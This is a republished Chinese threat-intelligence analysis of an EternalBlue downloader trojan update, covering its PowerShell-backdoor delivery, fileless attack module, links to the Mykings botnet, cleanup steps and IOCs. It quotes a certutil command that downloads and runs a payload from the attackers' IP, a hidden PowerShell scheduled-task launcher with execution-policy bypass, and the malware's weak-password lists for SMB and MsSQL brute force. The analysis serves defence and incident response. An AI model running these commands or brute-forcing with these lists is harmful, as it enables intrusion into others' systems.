永恒之蓝下载器木马升级更新没完没了

栏目: 数据库 · 发布时间: 5年前

内容简介:腾讯安全御见威胁情报中心于2019年3月8日发现曾利用驱动人生公司升级渠道的永恒之蓝下载器木马再次更新。此次更新仍然在于攻击模块,但是其特点在于,攻击模块不再由此前植入的母体PE文件进行释放,而是转为由感染后机器上安装的Powershell后门进行下载。通过分析发现,此次新启用的PE攻击模块下载地址同时还负责Powshell脚本攻击模块的下载,导致已感染的机器对其他机器发起PE文件攻击和“无文件”攻击。通过对比分析还发现“永恒之蓝”木马下载器黑产团伙使用的Powershell攻击代码与腾讯安全御见威胁情报中

腾讯安全御见威胁情报中心于2019年3月8日发现曾利用驱动人生公司升级渠道的永恒之蓝下载器木马再次更新。此次更新仍然在于攻击模块,但是其特点在于,攻击模块不再由此前植入的母体PE文件进行释放,而是转为由感染后机器上安装的Powershell后门进行下载。

通过分析发现,此次新启用的PE攻击模块下载地址同时还负责Powshell脚本攻击模块的下载,导致已感染的机器对其他机器发起PE文件攻击和“无文件”攻击。通过对比分析还发现“永恒之蓝”木马下载器黑产团伙使用的Powershell攻击代码与腾讯安全御见威胁情报中心2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处,因此推测两者具有某种联系。

“永恒之蓝”木马下载器黑产团伙时间线:

永恒之蓝下载器木马升级更新没完没了

PE文件攻击

下载指令:

certutil.exe  -urlcache -split -f hxxp://27.102.107.137/ii.exe i.exe

md5: def0e980d7c2a59b52d0c644a6e40763

该文件通过被感染机器的Powershell后门进行下载,保存为i.exe执行,其功能和此前多次更新的攻击模块C:\Windows\Temp\svchost.exe相同,该文件同样由Pyinstaller打包生成,集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击,分析其代码另发现以下几处变化:

1、对主程序的 Python 代码整体经过Base64、bz2算法进压缩编码,运行时先解码。

永恒之蓝下载器木马升级更新没完没了

2、对用于SMB、MsSQL爆破的弱口令进行更新,新增了13条弱口令:

'database',

'saadmin',

'sql2000',

'admin123',

' [email protected] ',

'sql123',

'sasasa',

'adminsa',

'sql2010',

'sa12345',

'sa123456',

'saadmin',

'sqlpass'

永恒之蓝下载器木马升级更新没完没了

3、从新的地址下载恶意代码执行:

·hxxp://info.haqo.net/e.png?id=

· hxxp://info.beahh.com/e.png?id=

· hxxp://info.abbny.com/e.png?id=

永恒之蓝下载器木马升级更新没完没了

“无文件”攻击。

通过已感染机器上的Powershell后门下载以下脚本代码执行:

hxxp://v.beahh.com/ipc?low1,该代码为经过多重混淆的Powershell脚本,解密后发现,其主要功能为下载另一脚本hxxp://27.102.107.137/new.dat?pebb并将其安装为计划任务Credentials执行。

永恒之蓝下载器木马升级更新没完没了

· 计划任务名:Credentials

· 启动程序:powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1

· 触发器:在首次执行当天触发后,无限期每隔一小时执行一次。

永恒之蓝下载器木马升级更新没完没了

该计划任务执行的Powershell文件cred.ps1,该文件同样经过多重混淆,解密后分析发现其集成了端口扫描、SMB爆破、永恒之蓝漏洞攻击等攻击方法,并且攻击成功后会在目标机器上传启动项。

永恒之蓝漏洞攻击。

永恒之蓝下载器木马升级更新没完没了

SMB弱口令爆破。

永恒之蓝下载器木马升级更新没完没了

攻击后上文件到传启动目录。

永恒之蓝下载器木马升级更新没完没了

此次更新后,木马脱离了原来的PE文件母体,直接通过已感染机器上安装的后门下载攻击模块,并且同时更新PE攻击模块和“无文件”形式的攻击模块,导致其拥有了更大的传播能力。

通过对比还发现,该木马使用的“无文件”攻击代码与腾讯安全御见威胁情报中心在2018年9月发现的Mykings僵尸网络变种(https://www.freebuf.com/column/183705.html)使用的攻击方法有较多相似之处,包括相同的攻击利用函数名eb7(),eb8(),创建计划任务的启动目录都为%appdata%\Microsoft\,都会在攻击成功后上传文件到菜单启动目录等,因此推测其与Myings僵尸网络幕后团伙有某种联系。

永恒之蓝下载器木马升级更新没完没了

安全建议

1.服务器暂时关闭不必要的端口(如135、139、445),方法可参考: https://guanjia.qq.com/web_clinic/s8/585.html

2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;

3.使用杀毒软件拦截可能的病毒攻击;

4.企业用户可部署腾讯御界高级威胁检测系统防御可能的黑客攻击。

永恒之蓝下载器木马升级更新没完没了

5.中毒电脑可参考以下提示手动清理:

删除文件

· %appdata%\Microsoft\cred.ps1

删除以下计划任务:

· 计划任务名:Credentials

· 启动程序:powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1

删除菜单启动目录文件:

· run.bat、FlashPlayer.lnk、flashplayer.tmp、sign.txt

IOCs

Md5

def0e980d7c2a59b52d0c644a6e40763

23196de0ede25fb9659713fa6799f455

ce924b12ffc55021f5c1bcf308f29704

2fbce2ecf670eb186c6e3e5886056312

IP

27.102.107.137

Domain

info.haqo.ne

info.beahh.com

info.abbny.com

v.beahh.com

URL

hxxp://info.haqo.net/e.png?id=

hxxp://info.beahh.com/e.png?id=

hxxp://info.abbny.com/e.png?id=

hxxp://27.102.107.137/ii.exe

hxxp://v.beahh.com/ipc?low1

hxxp://27.102.107.137/new.dat?pebb

弱口令:

"123456",

"password",

"PASSWORD",

"football",

"welcome",

"1",

"12",

"21",

"123",

"321",

"1234",

"12345",

"123123",

"123321",

"111111",

"654321",

"666666",

"121212",

"000000",

"222222",

"888888",

"1111",

"555555",

"1234567",

"12345678",

"123456789",

"987654321",

"admin",

"abc123",

"abcd1234",

" [email protected] ",

" [email protected] ",

" [email protected] ",

" [email protected] ",

" [email protected] ",

" [email protected] ",

" [email protected] ",

" [email protected] ",

"[email protected]$$w0rd",

"[email protected]$$word",

"[email protected]$$w0rd",

"iloveyou",

"monkey",

"login",

"passw0rd",

"master",

"hello",

"qazwsx",

"password1",

"qwerty",

"baseball",

"qwertyuiop",

"superman",

"1qaz2wsx",

"fuckyou",

"123qwe",

"zxcvbn",

"pass",

"aaaaaa",

"love",

"administrator"

'123456',

'password',

'qwerty',

'12345678',

'123456789',

'123',

'1234',

'123123',

'12345',

'12345678',

'123123123',

'1234567890',

'88888888',

'111111111',

'000000',

'111111',

'112233',

'123321',

'654321',

'666666',

'888888',

'a123456',

'123456a',

'5201314',

'1qaz2wsx',

'1q2w3e4r',

'qwe123',

'123qwe',

'a123456789',

'123456789a',

'baseball',

'dragon',

'football',

'iloveyou',

'password',

'sunshine',

'princess',

'welcome',

'abc123',

'monkey',

'[email protected]#$%^&*',

'charlie',

'aa123456',

'Aa123456',

'admin',

'homelesspa',

'password1',

'1q2w3e4r5t',

'qwertyuiop',

'1qaz2wsx',

'sa',

'sasa',

'sa123',

'sql2005',

'1',

' [email protected] ',

'sa2008',

'1111',

'passw0rd',

'abc',

'abc123',

'abcdefg',

'sapassword',

'Aa12345678',

'ABCabc123',

'sqlpassword',

'1qaz2wsx',

'1qaz!QAZ',

'sql2008',

'ksa8hd4,[email protected]~#$%^&*()',

'4yqbm4,m`[email protected]~#$%^&*(),.; ',

'4yqbm4,m`[email protected]~#$%^&*(),.;',

'A123456',

'database',

'saadmin',

'sql2000',

'admin123',

' [email protected] ',

'sql123',

'sasasa',

'adminsa',

'sql2010',

'sa12345',

'sa123456',

'saadmin',

'sqlpass'


以上所述就是小编给大家介绍的《永恒之蓝下载器木马升级更新没完没了》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

更快速网站

更快速网站

Steve Souders / 2009年12月 / 42.00元

对于任何成功的网站来说,性能是至关重要的。但伴随着不断增长的丰富内容和Ajax的过度使用,如今的Web应用已经将浏览器推至性能极限。在本书中,Google的Web性能专家和前任雅虎首席网站性能官Steve Souders提供了宝贵的技术,来帮助你优化网站性能。 作者的上一本书是非常畅销的《High Performance Web Sites》,它透露了80%的网页加载时间是花在客户端,使网络......一起来看看 《更快速网站》 这本书的介绍吧!

JS 压缩/解压工具
JS 压缩/解压工具

在线压缩/解压 JS 代码

URL 编码/解码
URL 编码/解码

URL 编码/解码

html转js在线工具
html转js在线工具

html转js在线工具